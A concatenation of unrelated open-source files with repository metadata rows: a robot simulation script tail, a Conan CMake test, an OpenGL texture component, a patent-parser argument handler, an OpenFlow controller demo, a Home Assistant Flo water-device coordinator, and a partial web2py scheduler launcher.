extractor.set_static_obj_names(['fake_obj', 'stairs', 'slidingDoor',
'DockStationBody', 'DockStationBody#0',\
'ConveyorBeltBody', 'ConveyorBeltBody#0', 'ConveyorBeltBody#1',
'ShelfBody', 'ShelfBody#0', 'ShelfBody#1'])
extractor.set_dynamic_obj_names(['Bill#3', 'product', 'fake_obj'])
extractor.set_robot_names(['turtlebot2i', 'turtlebot2i#0'])
print('Connected to remote API server')
print('Getting scene properties (this can take a while)...')
# Get all objects info once (for static properties)
extractor.operation_mode = vrep.simx_opmode_oneshot_wait
extractor.get_all_objects_info()
print('Finished getting scene properties!\n')
print('Started getting scene objects from vision sensor FOV...')
while True:
# Get dynamic object info (pose and vel) periodically
extractor.update_dynamic_obj_info()
# Update vision sensor info
extractor.update_all_robots_vision_sensors_fov()
# Get objects that are in the sensor FOV
for robot in extractor.robot_obj_list:
obj_list = extractor.get_objects_from_vision_sensor(robot.vision_sensor)
if (obj_list != None):
# Remove the robot itself from the list
obj_list = [i for i in obj_list if i.name!=robot.name]
# Print detected objects of the vision sensor
print(robot.name, robot.vision_sensor.name, obj_list)
#time.sleep(rate)
#vrep.simxStartSimulation(extractor.clientID, vrep.simx_opmode_blocking);
# Close the connection to V-REP
vrep.simxFinish(clientID)
| apache-2.0 | 809,577,537,197,511,800 | 33.072727 | 96 | 0.680896 | false |
Xaltotun/conan | conans/test/generators/cmake_test.py | 1 | 2742 | import re
import unittest
from conans.model.settings import Settings
from conans.model.conan_file import ConanFile
from conans.client.generators.cmake import CMakeGenerator
from conans.model.build_info import DepsCppInfo
from conans.model.ref import ConanFileReference
class CMakeGeneratorTest(unittest.TestCase):
def _extract_macro(self, name, text):
pattern = ".*(macro\(%s\).*?endmacro\(\)).*" % name
return re.sub(pattern, r"\1", text, flags=re.DOTALL)
def variables_setup_test(self):
conanfile = ConanFile(None, None, Settings({}), None)
ref = ConanFileReference.loads("MyPkg/0.1@lasote/stables")
cpp_info = DepsCppInfo()
cpp_info.defines = ["MYDEFINE1"]
conanfile.deps_cpp_info.update(cpp_info, ref)
ref = ConanFileReference.loads("MyPkg2/0.1@lasote/stables")
cpp_info = DepsCppInfo()
cpp_info.defines = ["MYDEFINE2"]
conanfile.deps_cpp_info.update(cpp_info, ref)
generator = CMakeGenerator(conanfile)
content = generator.content
cmake_lines = content.splitlines()
self.assertIn("set(CONAN_DEFINES_MYPKG -DMYDEFINE1)", cmake_lines)
self.assertIn("set(CONAN_DEFINES_MYPKG2 -DMYDEFINE2)", cmake_lines)
self.assertIn("set(CONAN_COMPILE_DEFINITIONS_MYPKG MYDEFINE1)", cmake_lines)
self.assertIn("set(CONAN_COMPILE_DEFINITIONS_MYPKG2 MYDEFINE2)", cmake_lines)
def aux_cmake_test_setup_test(self):
conanfile = ConanFile(None, None, Settings({}), None)
generator = CMakeGenerator(conanfile)
aux_cmake_test_setup = generator._aux_cmake_test_setup()
# extract the conan_basic_setup macro
macro = self._extract_macro("conan_basic_setup", aux_cmake_test_setup)
self.assertEqual("""macro(conan_basic_setup)
conan_check_compiler()
conan_output_dirs_setup()
conan_set_find_library_paths()
if(NOT "${ARGV0}" STREQUAL "TARGETS")
message(STATUS "Conan: Using cmake global configuration")
conan_global_flags()
else()
message(STATUS "Conan: Using cmake targets configuration")
conan_define_targets()
endif()
conan_set_rpath()
conan_set_vs_runtime()
conan_set_libcxx()
conan_set_find_paths()
endmacro()""", macro)
# extract the conan_set_find_paths macro
macro = self._extract_macro("conan_set_find_paths", aux_cmake_test_setup)
self.assertEqual("""macro(conan_set_find_paths)
# CMake can find findXXX.cmake files in the root of packages
set(CMAKE_MODULE_PATH ${CONAN_CMAKE_MODULE_PATH} ${CMAKE_MODULE_PATH})
# Make find_package() to work
set(CMAKE_PREFIX_PATH ${CONAN_CMAKE_MODULE_PATH} ${CMAKE_PREFIX_PATH})
endmacro()""", macro)
| mit | -7,118,005,159,781,577,000 | 40.545455 | 85 | 0.675419 | false |
bbc/kamaelia | Sketches/THF/Packages/Kamaelia/Community/THF/Kamaelia/UI/OpenGL/TexPlane.py | 12 | 5411 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2010 British Broadcasting Corporation and Kamaelia Contributors(1)
#
# (1) Kamaelia Contributors are listed in the AUTHORS file and at
# http://www.kamaelia.org/AUTHORS - please extend this file,
# not this notice.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# -------------------------------------------------------------------------
"""\
=====================
Textured Plane
=====================
A plane showing a texture loaded from an image file.
This component is a subclass of OpenGLComponent and therefore uses the
OpenGL display service.
Example Usage
-------------
A plane showing an image loaded from the file "nemo.jpeg"::
PLANE = TexPlane(position=(0, 0,-6), texture="nemo.jpeg").activate()
Axon.Scheduler.scheduler.run.runThreads()
How does it work?
-----------------
This component is a subclass of OpenGLComponent (for OpenGLComponent
functionality see its documentation). It overrides
__init__(), setup(), draw().
In setup() the method loadTexture() get called which loads the texure
from the image file specified. If the image in the file has dimensions
which are not equal a power of two, the texture dimensions get enlarged
(this is needed because of OpenGL texturing limitations).
In draw() a simple plane is drawn whith the loaded texture on it.
"""
import Axon
import pygame
from pygame.locals import *
from OpenGL.GL import *
from OpenGL.GLU import *
from Vector import Vector
from OpenGLComponent import *
from math import *
class TexPlane(OpenGLComponent):
"""\
TexPlane(...) -> A new TexPlane component.
A plane showing a texture loaded from an image file.
Keyword arguments:
- tex -- image file name
- pixelscaling -- factor for translation from pixels to units in 3D space (default=100.0)
"""
def __init__(self, **argd):
"""x.__init__(...) initializes x; see x.__class__.__doc__ for signature"""
super(TexPlane, self).__init__(**argd)
self.tex = argd.get("texture")
self.texID = 0
self.pixelscaling = argd.get("pixelscaling", 100.0)
def draw(self):
""" Draws textured plane. """
# set texure
glEnable(GL_TEXTURE_2D)
glBindTexture(GL_TEXTURE_2D, self.texID)
# draw faces
glTexEnvf(GL_TEXTURE_ENV, GL_TEXTURE_ENV_MODE, GL_REPLACE)
glBegin(GL_QUADS)
w = self.size.x/2.0
h = self.size.y/2.0
glTexCoord2f(0.0, 1.0-self.tex_h); glVertex3f(-w, -h, 0.0)
glTexCoord2f(self.tex_w, 1.0-self.tex_h); glVertex3f( w, -h, 0.0)
glTexCoord2f(self.tex_w, 1.0); glVertex3f( w, h, 0.0)
glTexCoord2f(0.0, 1.0); glVertex3f(-w, h, 0.0)
glEnd()
glDisable(GL_TEXTURE_2D)
def loadTexture(self):
""" Loads texture from specified image file. """
if self.tex is not None:
# load image
image = pygame.image.load(self.tex)
# create power of 2 dimensioned surface
pow2size = (int(2**(ceil(log(image.get_width(), 2)))), int(2**(ceil(log(image.get_height(), 2)))))
if pow2size != image.get_size():
textureSurface = pygame.Surface(pow2size, pygame.SRCALPHA, 32)
# determine texture coordinates
self.tex_w = float(image.get_width())/pow2size[0]
self.tex_h = float(image.get_height())/pow2size[1]
# copy image data to pow2surface
textureSurface.blit(image, (0,0))
else:
textureSurface = image
self.tex_w = 1.0
self.tex_h = 1.0
# set plane size
self.size = Vector(float(image.get_width())/float(self.pixelscaling), float(image.get_height())/float(self.pixelscaling), 0)
# read pixel data
textureData = pygame.image.tostring(textureSurface, "RGBX", 1)
# gen tex name
self.texID = glGenTextures(1)
# create texture
glEnable(GL_TEXTURE_2D)
glBindTexture(GL_TEXTURE_2D, self.texID)
glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MAG_FILTER, GL_LINEAR)
glTexParameterf(GL_TEXTURE_2D, GL_TEXTURE_MIN_FILTER, GL_LINEAR)
glTexImage2D( GL_TEXTURE_2D, 0, GL_RGBA, textureSurface.get_width(), textureSurface.get_height(), 0,
GL_RGBA, GL_UNSIGNED_BYTE, textureData );
glDisable(GL_TEXTURE_2D)
def setup(self):
""" Load texture. """
self.loadTexture()
__kamaelia_components__ = (TexPlane,)
if __name__=='__main__':
PLANE = TexPlane(position=(0, 0,-6), texture="nemo.jpeg").activate()
Axon.Scheduler.scheduler.run.runThreads()
# Licensed to the BBC under a Contributor Agreement: THF
| apache-2.0 | -6,426,957,485,463,028,000 | 34.136364 | 136 | 0.608945 | false |
yngcan/patentprocessor | lib/argconfig_parse.py | 6 | 4419 | #!/usr/bin/env python
"""
Copyright (c) 2013 The Regents of the University of California, AMERICAN INSTITUTES FOR RESEARCH
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
"""
@author Gabe Fierro [email protected] github.com/gtfierro
"""
"""
Handles argument parsing for parse.py
"""
import sys
import os
import argparse
import logging
class ArgHandler(object):
def __init__(self, arglist):
self.arglist = arglist
# setup argparse
self.parser = argparse.ArgumentParser(description=\
'Specify source directory/directories for xml files to be parsed')
self.parser.add_argument('--patentroot','-p', type=str, nargs='?',
default=os.environ['PATENTROOT'] \
if os.environ.has_key('PATENTROOT') else '.',
help='root directory of all patent files')
self.parser.add_argument('--xmlregex','-x', type=str,
nargs='?',
help='regex used to match xml files in the PATENTROOT directory.\
Defaults to ipg\d{6}.xml')
self.parser.add_argument('--verbosity', '-v', type = int,
nargs='?', default=0,
help='Set the level of verbosity for the computation. The higher the \
verbosity level, the less restrictive the print policy. 0 (default) \
= error, 1 = warning, 2 = info, 3 = debug')
self.parser.add_argument('--output-directory', '-o', type=str, nargs='?',
default=os.environ['PATENTOUTPUTDIR'] \
if os.environ.has_key('PATENTOUTPUTDIR') else '.',
help='Set the output directory for the resulting sqlite3 files. Defaults\
to the current directory "."')
self.parser.add_argument('--document-type', '-d', type=str, nargs='?',
default='grant',
help='Set the type of patent document to be parsed: grant (default) \
or application')
# parse arguments and assign values
args = self.parser.parse_args(self.arglist)
self.xmlregex = args.xmlregex
self.patentroot = args.patentroot
self.output_directory = args.output_directory
self.document_type = args.document_type
if self.xmlregex == None: # set defaults for xmlregex here depending on doctype
if self.document_type == 'grant':
self.xmlregex = r"ipg\d{6}.xml"
else:
self.xmlregex = r"i?pa\d{6}.xml"
# adjust verbosity levels based on specified input
logging_levels = {0: logging.ERROR,
1: logging.WARNING,
2: logging.INFO,
3: logging.DEBUG}
self.verbosity = logging_levels[args.verbosity]
def get_xmlregex(self):
return self.xmlregex
def get_patentroot(self):
return self.patentroot
def get_verbosity(self):
return self.verbosity
def get_output_directory(self):
return self.output_directory
def get_document_type(self):
return self.document_type
def get_help(self):
self.parser.print_help()
sys.exit(1)
| bsd-2-clause | -1,561,995,159,197,825,000 | 40.688679 | 96 | 0.651957 | false |
tnadeau/pybvc | samples/sampleopenflow/demos/demo35.py | 4 | 13745 | #!/usr/bin/python
# Copyright (c) 2015, BROCADE COMMUNICATIONS SYSTEMS, INC
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from this
# software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
"""
@authors: Sergei Garbuzov
@status: Development
@version: 1.1.0
"""
import json
import time
from pybvc.controller.controller import Controller
from pybvc.openflowdev.ofswitch import (OFSwitch,
FlowEntry,
Match,
Instruction,
PopVlanHeaderAction,
GroupAction,
GroupEntry,
GroupBucket,
OutputAction)
from pybvc.common.utils import load_dict_from_file
from pybvc.common.status import STATUS
from pybvc.common.constants import (OFPGT_INDIRECT, ETH_TYPE_IPv4)
def delete_flows(ofswitch, table_id, flow_ids):
for flow_id in flow_ids:
result = ofswitch.delete_flow(table_id, flow_id)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< Flow with id of '%s' successfully removed "
"from the Controller" % flow_id)
else:
print ("!!!Flow '%s' removal error, reason: %s" %
(flow_id, status.brief()))
def delete_groups(ofswitch, group_ids):
for group_id in group_ids:
result = ofswitch.delete_group(group_id)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< Group '%s' successfully removed from the Controller" %
group_id)
else:
print ("!!!Group '%s' removal error, reason: %s" %
(group_id, status.brief()))
def print_groups(lcfg, loper):
q = 10 # number of list items to be in a single chunk (output string)
print "\n".strip()
s = 'Configured Groups IDs'
if lcfg:
chunks = [lcfg[x:x + q] for x in xrange(0, len(lcfg), q)]
print " %s :" % s,
for i in range(0, len(chunks)):
n = 0 if i == 0 else len(s) + 18
print "%s%s" % (" " * n, ", ".join(map(str, chunks[i])))
else:
print " %s : %s" % (s, "none")
s = 'Operational Groups IDs'
if loper:
chunks = [loper[x:x + q] for x in xrange(0, len(loper), q)]
print " %s :" % s,
for i in range(0, len(chunks)):
n = 0 if i == 0 else len(s) + 18
print "%s%s" % (" " * n, ", ".join(map(str, chunks[i])))
else:
print " %s : %s" % (s, "none")
def of_demo_35():
f = "cfg.yml"
d = {}
if(load_dict_from_file(f, d) is False):
print("Config file '%s' read error: " % f)
exit()
try:
ctrlIpAddr = d['ctrlIpAddr']
ctrlPortNum = d['ctrlPortNum']
ctrlUname = d['ctrlUname']
ctrlPswd = d['ctrlPswd']
nodeName = d['nodeName']
rundelay = d['rundelay']
except:
print ("Failed to get Controller device attributes")
exit(0)
print ("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
print ("<<< Demo 35 Start")
print ("<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<")
ctrl = Controller(ctrlIpAddr, ctrlPortNum, ctrlUname, ctrlPswd)
ofswitch = OFSwitch(ctrl, nodeName)
print "\n".strip()
print ("<<< 'Controller': %s, 'OpenFlow' switch: '%s'" %
(ctrlIpAddr, nodeName))
grp_ids_cfg = []
grp_ids_oper = []
print "\n".strip()
print ("<<< Get OpenFlow Groups Information")
time.sleep(rundelay)
result = ofswitch.get_configured_group_ids()
status = result.get_status()
if(status.eq(STATUS.OK)):
grp_ids_cfg = result.get_data()
elif(status.eq(STATUS.DATA_NOT_FOUND)):
grp_ids_cfg = []
else:
print ("\n")
print ("!!!Demo terminated, reason: %s" % status.detailed())
exit(0)
result = ofswitch.get_operational_group_ids()
status = result.get_status()
if(status.eq(STATUS.OK)):
grp_ids_oper = result.get_data()
elif(status.eq(STATUS.DATA_NOT_FOUND)):
grp_ids_oper = []
else:
print ("\n")
print ("!!!Demo terminated, reason: %s" % status.detailed())
exit(0)
# Show current state of the Group Table in the Controller's
# configuration and operational data stores
print_groups(grp_ids_cfg, grp_ids_oper)
# Create new group
group_id = 14
group_type = OFPGT_INDIRECT
group_name = "Example of 'set of common actions' group "
out_port = 110
print "\n".strip()
print ("<<< Create Group")
print "\n".strip()
print (" Group Type : %s\n"
" Group ID : %s\n"
" Group Name : \"%s\"" %
(group_type.strip('group-').upper(),
group_id, group_name))
print (" Buckets :")
print (" [0] actions : Pop VLAN")
print (" Output (%s)" %
(out_port))
time.sleep(rundelay)
# Allocate a placeholder for the group entry
group_entry = GroupEntry(group_id, group_type)
group_entry.set_group_name(group_name)
# Fill actions bucket with the set of actions
bucket_id = 0
bucket = GroupBucket(bucket_id)
action_order = 0
action1 = PopVlanHeaderAction(action_order)
bucket.add_action(action1)
action_order += 1
action2 = OutputAction(action_order)
action2.set_outport(out_port)
bucket.add_action(action2)
# Add actions bucket to the group entry
group_entry.add_bucket(bucket)
# Request Controller to create the group
print "\n".strip()
print ("<<< Group to create:")
print group_entry.get_payload()
time.sleep(rundelay)
result = ofswitch.add_modify_group(group_entry)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< Group successfully added")
grp_ids_oper = result.get_data()
else:
print ("\n").strip()
print ("!!!Demo terminated, reason: %s" % status.detailed())
exit(0)
print ("\n").strip()
print ("<<< Get group '%s' configuration status") % group_id
time.sleep(rundelay)
result = ofswitch.get_configured_group(group_id)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("Group configuration info:")
group = result.get_data()
print json.dumps(group, indent=4)
else:
print ("\n").strip()
print ("!!!Demo terminated, reason: %s" % status.detailed())
exit(0)
print ("\n").strip()
print ("<<< Get group '%s' operational status") % group_id
time.sleep(rundelay)
result = ofswitch.get_group_description(group_id)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("Group operational info:")
group = result.get_data()
print json.dumps(group, indent=4)
else:
print ("\n").strip()
print ("!!!Error, reason: %s" % status.detailed())
print ("\n").strip()
print ("<<< Get group '%s' statistics information") % group_id
time.sleep(rundelay)
result = ofswitch.get_group_statistics(group_id)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("Group statistics info:")
group = result.get_data()
print json.dumps(group, indent=4)
else:
print ("\n").strip()
print ("!!!Error, reason: %s" % status.detailed())
print ("\n").strip()
print ("<<< Get OpenFlow Groups Information")
time.sleep(rundelay)
result = ofswitch.get_configured_group_ids()
status = result.get_status()
if(status.eq(STATUS.OK)):
grp_ids_cfg = result.get_data()
elif(status.eq(STATUS.DATA_NOT_FOUND)):
grp_ids_cfg = []
else:
print ("\n").strip()
print ("!!!Error, reason: %s" % status.detailed())
result = ofswitch.get_operational_group_ids()
status = result.get_status()
if(status.eq(STATUS.OK)):
grp_ids_oper = result.get_data()
elif(status.eq(STATUS.DATA_NOT_FOUND)):
grp_ids_oper = []
else:
print ("\n").strip()
print ("!!!Error, reason: %s" % status.detailed())
# Show current state of the Group Table in the Controller's
# configuration and operational data stores
print_groups(grp_ids_cfg, grp_ids_oper)
first_flow_id = 110
# ---------------------------------------------------
# First flow entry
# ---------------------------------------------------
table_id = 0
flow_id = first_flow_id
flow_name = "Group action example"
priority = 1000
cookie = 1400
match_in_port = 109
match_eth_type = ETH_TYPE_IPv4
print "\n".strip()
print ("<<< Set OpenFlow flow on the Controller")
print (" Match: Input Port (%s)\n"
" Ethernet Type (%s)" %
(match_in_port, hex(match_eth_type)))
print (" Actions: Apply Group (%s)\n" % group_id)
time.sleep(rundelay)
# Allocate a placeholder for the Flow Entry
flow_entry1 = FlowEntry()
# Generic attributes of the Flow Entry
flow_entry1.set_flow_table_id(table_id)
flow_entry1.set_flow_name(flow_name)
flow_entry1.set_flow_id(flow_id)
flow_entry1.set_flow_cookie(cookie)
flow_entry1.set_flow_priority(priority)
flow_entry1.set_flow_hard_timeout(0)
flow_entry1.set_flow_idle_timeout(0)
# Instructions/Actions for the Flow Entry
instruction = Instruction(instruction_order=0)
action_order = 0
action = GroupAction(action_order)
action.set_group_id(group_id)
instruction.add_apply_action(action)
flow_entry1.add_instruction(instruction)
# Match Fields for the Flow Entry
match = Match()
match.set_in_port(match_in_port)
match.set_eth_type(match_eth_type)
flow_entry1.add_match(match)
print ("<<< Flow to send:")
print flow_entry1.get_payload()
time.sleep(rundelay)
result = ofswitch.add_modify_flow(flow_entry1)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< Flow successfully added to the Controller")
else:
print ("\n")
print ("!!!Demo terminated, reason: %s" % status.detailed())
delete_groups(ofswitch, grp_ids_cfg)
delete_flows(ofswitch, table_id, range(first_flow_id, flow_id + 1))
exit(0)
print "\n".strip()
print ("<<< Remove all flows from the Controller")
time.sleep(rundelay)
delete_flows(ofswitch, table_id, range(first_flow_id, flow_id + 1))
print "\n".strip()
print ("<<< Remove all groups from the Controller")
for group_id in grp_ids_cfg:
result = ofswitch.delete_group(group_id)
status = result.get_status()
if(status.eq(STATUS.OK)):
print ("<<< Group '%s' successfully removed from the Controller" %
group_id)
else:
print ("\n").strip()
print ("!!!Error, failed to remove group '%s', reason: %s" %
(group_id, status.detailed()))
print ("\n").strip()
print ("<<< Get OpenFlow Groups Information")
time.sleep(rundelay)
result = ofswitch.get_configured_group_ids()
status = result.get_status()
if(status.eq(STATUS.OK)):
grp_ids_cfg = result.get_data()
elif(status.eq(STATUS.DATA_NOT_FOUND)):
grp_ids_cfg = []
else:
print ("\n").strip()
print ("!!!Error, reason: %s" % status.detailed())
result = ofswitch.get_operational_group_ids()
status = result.get_status()
if(status.eq(STATUS.OK)):
grp_ids_oper = result.get_data()
elif(status.eq(STATUS.DATA_NOT_FOUND)):
grp_ids_oper = []
else:
print ("\n")
print ("!!!Error, reason: %s" % status.detailed())
# Show current state of the Group Table in the Controller's
# configuration and operational data stores
print_groups(grp_ids_cfg, grp_ids_oper)
print ("\n").strip()
print (">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
print (">>> Demo End")
print (">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
if __name__ == "__main__":
of_demo_35()
| bsd-3-clause | 4,864,706,703,511,868,000 | 32.442822 | 78 | 0.575773 | false |
balloob/home-assistant | homeassistant/components/flo/device.py | 6 | 7349 | """Flo device object."""
import asyncio
from datetime import datetime, timedelta
import logging
from typing import Any, Dict, Optional
from aioflo.api import API
from aioflo.errors import RequestError
from async_timeout import timeout
from homeassistant.helpers.typing import HomeAssistantType
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed
import homeassistant.util.dt as dt_util
from .const import DOMAIN as FLO_DOMAIN
_LOGGER = logging.getLogger(__name__)
class FloDeviceDataUpdateCoordinator(DataUpdateCoordinator):
"""Flo device object."""
def __init__(
self, hass: HomeAssistantType, api_client: API, location_id: str, device_id: str
):
"""Initialize the device."""
self.hass: HomeAssistantType = hass
self.api_client: API = api_client
self._flo_location_id: str = location_id
self._flo_device_id: str = device_id
self._manufacturer: str = "Flo by Moen"
self._device_information: Optional[Dict[str, Any]] = None
self._water_usage: Optional[Dict[str, Any]] = None
super().__init__(
hass,
_LOGGER,
name=f"{FLO_DOMAIN}-{device_id}",
update_interval=timedelta(seconds=60),
)
async def _async_update_data(self):
"""Update data via library."""
try:
async with timeout(10):
await asyncio.gather(
*[self._update_device(), self._update_consumption_data()]
)
except (RequestError) as error:
raise UpdateFailed(error) from error
@property
def location_id(self) -> str:
"""Return Flo location id."""
return self._flo_location_id
@property
def id(self) -> str:
"""Return Flo device id."""
return self._flo_device_id
@property
def device_name(self) -> str:
"""Return device name."""
return f"{self.manufacturer} {self.model}"
@property
def manufacturer(self) -> str:
"""Return manufacturer for device."""
return self._manufacturer
@property
def mac_address(self) -> str:
"""Return ieee address for device."""
return self._device_information["macAddress"]
@property
def model(self) -> str:
"""Return model for device."""
return self._device_information["deviceModel"]
@property
def rssi(self) -> float:
"""Return rssi for device."""
return self._device_information["connectivity"]["rssi"]
@property
def last_heard_from_time(self) -> str:
"""Return lastHeardFromTime for device."""
return self._device_information["lastHeardFromTime"]
@property
def device_type(self) -> str:
"""Return the device type for the device."""
return self._device_information["deviceType"]
@property
def available(self) -> bool:
"""Return True if device is available."""
return self.last_update_success and self._device_information["isConnected"]
@property
def current_system_mode(self) -> str:
"""Return the current system mode."""
return self._device_information["systemMode"]["lastKnown"]
@property
def target_system_mode(self) -> str:
"""Return the target system mode."""
return self._device_information["systemMode"]["target"]
@property
def current_flow_rate(self) -> float:
"""Return current flow rate in gpm."""
return self._device_information["telemetry"]["current"]["gpm"]
@property
def current_psi(self) -> float:
"""Return the current pressure in psi."""
return self._device_information["telemetry"]["current"]["psi"]
@property
def temperature(self) -> float:
"""Return the current temperature in degrees F."""
return self._device_information["telemetry"]["current"]["tempF"]
@property
def consumption_today(self) -> float:
"""Return the current consumption for today in gallons."""
return self._water_usage["aggregations"]["sumTotalGallonsConsumed"]
@property
def firmware_version(self) -> str:
"""Return the firmware version for the device."""
return self._device_information["fwVersion"]
@property
def serial_number(self) -> str:
"""Return the serial number for the device."""
return self._device_information["serialNumber"]
@property
def pending_info_alerts_count(self) -> int:
"""Return the number of pending info alerts for the device."""
return self._device_information["notifications"]["pending"]["infoCount"]
@property
def pending_warning_alerts_count(self) -> int:
"""Return the number of pending warning alerts for the device."""
return self._device_information["notifications"]["pending"]["warningCount"]
@property
def pending_critical_alerts_count(self) -> int:
"""Return the number of pending critical alerts for the device."""
return self._device_information["notifications"]["pending"]["criticalCount"]
@property
def has_alerts(self) -> bool:
"""Return True if any alert counts are greater than zero."""
return bool(
self.pending_info_alerts_count
or self.pending_warning_alerts_count
or self.pending_warning_alerts_count
)
@property
def last_known_valve_state(self) -> str:
"""Return the last known valve state for the device."""
return self._device_information["valve"]["lastKnown"]
@property
def target_valve_state(self) -> str:
"""Return the target valve state for the device."""
return self._device_information["valve"]["target"]
async def async_set_mode_home(self):
"""Set the Flo location to home mode."""
await self.api_client.location.set_mode_home(self._flo_location_id)
async def async_set_mode_away(self):
"""Set the Flo location to away mode."""
await self.api_client.location.set_mode_away(self._flo_location_id)
async def async_set_mode_sleep(self, sleep_minutes, revert_to_mode):
"""Set the Flo location to sleep mode."""
await self.api_client.location.set_mode_sleep(
self._flo_location_id, sleep_minutes, revert_to_mode
)
async def async_run_health_test(self):
"""Run a Flo device health test."""
await self.api_client.device.run_health_test(self._flo_device_id)
async def _update_device(self, *_) -> None:
"""Update the device information from the API."""
self._device_information = await self.api_client.device.get_info(
self._flo_device_id
)
_LOGGER.debug("Flo device data: %s", self._device_information)
async def _update_consumption_data(self, *_) -> None:
"""Update water consumption data from the API."""
today = dt_util.now().date()
start_date = datetime(today.year, today.month, today.day, 0, 0)
end_date = datetime(today.year, today.month, today.day, 23, 59, 59, 999000)
self._water_usage = await self.api_client.water.get_consumption_info(
self._flo_location_id, start_date, end_date
)
_LOGGER.debug("Updated Flo consumption data: %s", self._water_usage)
| apache-2.0 | -6,069,660,303,512,820,000 | 34.331731 | 88 | 0.629609 | false |
frankyrumple/smc | static/scheduler/start_misc_scheduler.py | 1 | 1998 | #!/usr/bin/python
import sys, os
import subprocess
# Get the current folder
folder = os.path.abspath(__file__)
folder = os.path.dirname(folder)
# Change to static folder
folder = os.path.dirname(folder)
# Change to app folder
folder = os.path.dirname(folder)
# Get app name
app_name = folder.split(os.sep)[-1]
# Change to applications folder
folder = os.path.dirname(folder)
# Change to w2py root folder
folder = os.path.dirname(folder)
# Set the system to that folder
os.chdir(folder)
# Change to the web2py folder
print "App: " + app_name
print "W2PyFolder: " + os.getcwd()
group_name = "misc"
print "Scheduler Group: " + group_name
pid = "0"
try:
f = open(app_name + ".scheduler." + group_name + ".pid", 'r+')
pid = f.read()
f.close()
except IOError:
pid = "0"
pid = pid.strip()
if (pid == ""):
pid = "0"
print "Last PID: " + str(pid)
# See if web2py scheduler is running
cmd1 = ["/bin/ps ax | grep 'web2py' | awk '{print $1;}'"]
p1 = subprocess.Popen(cmd1, stdout=subprocess.PIPE, shell=True)
out = p1.communicate()[0]
running = False
for line in out.split(os.linesep):
if (pid == line.strip()):
running = True
print "PS List: " + out
s = open(app_name + '.scheduler.' + group_name + '.log', 'a')
if (running == True):
# Process is running?
print "PS IS RUNNING"
s.write("PS IS RUNNING\n")
else:
print "PS NOT RUNNING"
s.write("PS NOT RUNNING\n")
# Start the scheduler app
#cmd = ["/usr/bin/nohup /usr/bin/python web2py.py -K " + app_name + " > /dev/null 2>&1 &"]
